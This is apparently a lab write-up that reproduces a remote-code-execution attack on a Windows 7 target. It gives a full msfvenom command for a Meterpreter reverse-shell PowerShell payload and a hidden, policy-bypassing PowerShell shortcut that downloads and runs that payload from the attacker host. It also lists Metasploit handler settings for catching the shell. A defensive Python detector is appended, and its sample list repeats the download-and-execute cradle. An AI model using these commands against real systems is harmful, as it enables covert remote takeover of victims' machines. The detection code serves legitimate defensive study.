1. Affected versions
Scope of affected systems:
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
Server systems:
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
2. Exploitation and reproduction
Attacker machine: Kali 2019.4, IP 192.168.1.192
Target machine: Windows 7 Professional, IP 192.168.1.182
Attack via a PowerShell shortcut
Generate the attack file search.ps1. In a terminal, run: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.192 -f psh-reflection > search.ps1
Change to the opt directory and confirm that the search.ps1 PowerShell backdoor has been generated.
Copy the generated search.ps1 into /var/www/html.
cd into /var/www/html and confirm that search.ps1 is present.
Start the Apache service.
Browse to http://127.0.0.1/search.ps1 on the web server; the file is served directly:
On the target machine, create a shortcut that runs PowerShell remotely:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.192/search.ps1');test.ps1"
Shortcut name: powershell.exe
On Kali, set up the listener for the reverse connection; the target's shell is successfully returned:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.192
set LPORT 5555
exploit (starts listening)
Run the newly created PowerShell shortcut on the target machine and the shell is returned; the result is shown in the screenshot below.
Running ipconfig then shows that the target's IP is 192.168.1.182.
The test ends here.
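A defender-side check, added here as an example and not part of the original write-up: it scans process command lines (as recorded by Security Event ID 4688 or Sysmon Event ID 1 with command-line auditing enabled) for the hidden-window, policy-bypass, download-and-execute cradle pattern that the shortcut above uses. The sample command lines are constructed, and the indicator names and scoring threshold are my own assumptions.

```python
import re
from dataclasses import dataclass

# Indicators taken from the shortcut command line used in the reproduction
# above. Short switch forms are included because powershell.exe accepts
# unambiguous prefixes (-w for -WindowStyle, -ep/-exec for -ExecutionPolicy,
# -enc for -EncodedCommand). All patterns are matched case-insensitively.
INDICATORS = [
    ("hidden_window",     re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass",     re.compile(r"-e(xec|xecutionpolicy|p)?\s+bypass", re.I)),
    ("web_download",      re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I)),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("encoded_command",   re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)

@dataclass
class Verdict:
    suspicious: bool
    indicators: list   # names of INDICATORS that matched, in table order
    urls: list         # remote script locations to block and hunt for

def analyze_command_line(cmdline: str) -> Verdict:
    """Classify one process command line (e.g. from Event ID 4688 or Sysmon 1)."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    download_and_run = "web_download" in hits and "invoke_expression" in hits
    stealthy_encoded = "encoded_command" in hits and (
        "hidden_window" in hits or "policy_bypass" in hits)
    suspicious = download_and_run or stealthy_encoded or len(hits) >= 3
    return Verdict(suspicious, hits, URL_RE.findall(cmdline))

# Constructed sample command lines (not real telemetry). The first mirrors the
# shortcut from the write-up; the third carries a placeholder base64 blob.
SAMPLE_COMMAND_LINES = [
    "powershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://192.168.1.192/search.ps1')\"",
    "powershell.exe -NoProfile -Command Get-Process",
    "powershell -w hidden -ep bypass -enc QUFBQUFBQUFBQUFBQUFBQUFBQUE=",
    "cmd.exe /c dir",
]

def scan(command_lines):
    """Return (command line, verdict) pairs for the suspicious entries only."""
    verdicts = [(c, analyze_command_line(c)) for c in command_lines]
    return [(c, v) for c, v in verdicts if v.suspicious]

if __name__ == "__main__":
    for cmd, v in scan(SAMPLE_COMMAND_LINES):
        print(f"[!] {v.indicators} urls={v.urls}\n    {cmd}")
```

When PowerShell Script Block Logging (Event ID 4104) is enabled, the decoded script text is logged even for the -EncodedCommand form, so the same patterns can be applied to that text as well.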
Do not use these techniques for illegal purposes.
I take no responsibility for anything that happens as a result.